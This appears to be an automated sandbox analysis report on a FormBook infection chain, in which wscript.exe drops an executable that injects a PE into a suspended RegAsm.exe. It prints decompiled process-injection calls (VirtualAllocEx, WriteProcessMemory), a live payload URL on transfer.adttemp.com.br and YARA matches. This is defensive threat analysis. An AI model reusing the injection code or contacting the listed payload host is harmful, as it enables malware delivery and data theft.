Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3D6F0 mov eax, dword ptr fs:[00000030h]	3_2_02D3D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB36EF mov eax, dword ptr fs:[00000030h]	3_2_02CB36EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD6E0 mov eax, dword ptr fs:[00000030h]	3_2_02CAD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD6E0 mov eax, dword ptr fs:[00000030h]	3_2_02CAD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84690 mov eax, dword ptr fs:[00000030h]	3_2_02C84690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84690 mov eax, dword ptr fs:[00000030h]	3_2_02C84690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D6AA mov eax, dword ptr fs:[00000030h]	3_2_02C7D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D6AA mov eax, dword ptr fs:[00000030h]	3_2_02C7D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC6A6 mov eax, dword ptr fs:[00000030h]	3_2_02CBC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C776B2 mov eax, dword ptr fs:[00000030h]	3_2_02C776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C776B2 mov eax, dword ptr fs:[00000030h]	3_2_02C776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C776B2 mov eax, dword ptr fs:[00000030h]	3_2_02C776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB66B0 mov eax, dword ptr fs:[00000030h]	3_2_02CB66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9C640 mov eax, dword ptr fs:[00000030h]	3_2_02C9C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA660 mov eax, dword ptr fs:[00000030h]	3_2_02CBA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA660 mov eax, dword ptr fs:[00000030h]	3_2_02CBA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB9660 mov eax, dword ptr fs:[00000030h]	3_2_02CB9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB9660 mov eax, dword ptr fs:[00000030h]	3_2_02CB9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4866E mov eax, dword ptr fs:[00000030h]	3_2_02D4866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4866E mov eax, dword ptr fs:[00000030h]	3_2_02D4866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB2674 mov eax, dword ptr fs:[00000030h]	3_2_02CB2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE609 mov eax, dword ptr fs:[00000030h]	3_2_02CFE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBF603 mov eax, dword ptr fs:[00000030h]	3_2_02CBF603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB1607 mov eax, dword ptr fs:[00000030h]	3_2_02CB1607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2619 mov eax, dword ptr fs:[00000030h]	3_2_02CC2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C83616 mov eax, dword ptr fs:[00000030h]	3_2_02C83616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C83616 mov eax, dword ptr fs:[00000030h]	3_2_02C83616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55636 mov eax, dword ptr fs:[00000030h]	3_2_02D55636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8262C mov eax, dword ptr fs:[00000030h]	3_2_02C8262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB6620 mov eax, dword ptr fs:[00000030h]	3_2_02CB6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB8620 mov eax, dword ptr fs:[00000030h]	3_2_02CB8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E627 mov eax, dword ptr fs:[00000030h]	3_2_02C9E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8C7C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C857C0 mov eax, dword ptr fs:[00000030h]	3_2_02C857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C857C0 mov eax, dword ptr fs:[00000030h]	3_2_02C857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C857C0 mov eax, dword ptr fs:[00000030h]	3_2_02C857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA27ED mov eax, dword ptr fs:[00000030h]	3_2_02CA27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA27ED mov eax, dword ptr fs:[00000030h]	3_2_02CA27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA27ED mov eax, dword ptr fs:[00000030h]	3_2_02CA27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8D7E0 mov ecx, dword ptr fs:[00000030h]	3_2_02C8D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C847FB mov eax, dword ptr fs:[00000030h]	3_2_02C847FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C847FB mov eax, dword ptr fs:[00000030h]	3_2_02C847FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F78A mov eax, dword ptr fs:[00000030h]	3_2_02D3F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D537B6 mov eax, dword ptr fs:[00000030h]	3_2_02D537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C807AF mov eax, dword ptr fs:[00000030h]	3_2_02C807AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D097A9 mov eax, dword ptr fs:[00000030h]	3_2_02D097A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD7B0 mov eax, dword ptr fs:[00000030h]	3_2_02CAD7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D04755 mov eax, dword ptr fs:[00000030h]	3_2_02D04755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB674D mov esi, dword ptr fs:[00000030h]	3_2_02CB674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB674D mov eax, dword ptr fs:[00000030h]	3_2_02CB674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB674D mov eax, dword ptr fs:[00000030h]	3_2_02CB674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93740 mov eax, dword ptr fs:[00000030h]	3_2_02C93740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93740 mov eax, dword ptr fs:[00000030h]	3_2_02C93740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93740 mov eax, dword ptr fs:[00000030h]	3_2_02C93740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80750 mov eax, dword ptr fs:[00000030h]	3_2_02C80750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2750 mov eax, dword ptr fs:[00000030h]	3_2_02CC2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2750 mov eax, dword ptr fs:[00000030h]	3_2_02CC2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D53749 mov eax, dword ptr fs:[00000030h]	3_2_02D53749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C88770 mov eax, dword ptr fs:[00000030h]	3_2_02C88770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C85702 mov eax, dword ptr fs:[00000030h]	3_2_02C85702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C85702 mov eax, dword ptr fs:[00000030h]	3_2_02C85702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87703 mov eax, dword ptr fs:[00000030h]	3_2_02C87703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC700 mov eax, dword ptr fs:[00000030h]	3_2_02CBC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBF71F mov eax, dword ptr fs:[00000030h]	3_2_02CBF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBF71F mov eax, dword ptr fs:[00000030h]	3_2_02CBF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80710 mov eax, dword ptr fs:[00000030h]	3_2_02C80710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB0710 mov eax, dword ptr fs:[00000030h]	3_2_02CB0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C83720 mov eax, dword ptr fs:[00000030h]	3_2_02C83720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9F720 mov eax, dword ptr fs:[00000030h]	3_2_02C9F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9F720 mov eax, dword ptr fs:[00000030h]	3_2_02C9F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9F720 mov eax, dword ptr fs:[00000030h]	3_2_02C9F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC720 mov eax, dword ptr fs:[00000030h]	3_2_02CBC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC720 mov eax, dword ptr fs:[00000030h]	3_2_02CBC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8973A mov eax, dword ptr fs:[00000030h]	3_2_02C8973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8973A mov eax, dword ptr fs:[00000030h]	3_2_02C8973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB273C mov eax, dword ptr fs:[00000030h]	3_2_02CB273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB273C mov ecx, dword ptr fs:[00000030h]	3_2_02CB273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB273C mov eax, dword ptr fs:[00000030h]	3_2_02CB273C

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: temp_executable.exe.0.dr

Jump to dropped file

.NET source code references suspicious native API functions

Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A90008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.196.109.209	transfer.adttemp.com.br	United States		15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
transfer.adttemp.com.br	104.196.109.209	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://transfer.adttemp.com.br/Io2SD/sirdeeeeee.txt	false		unknown

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:49704 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
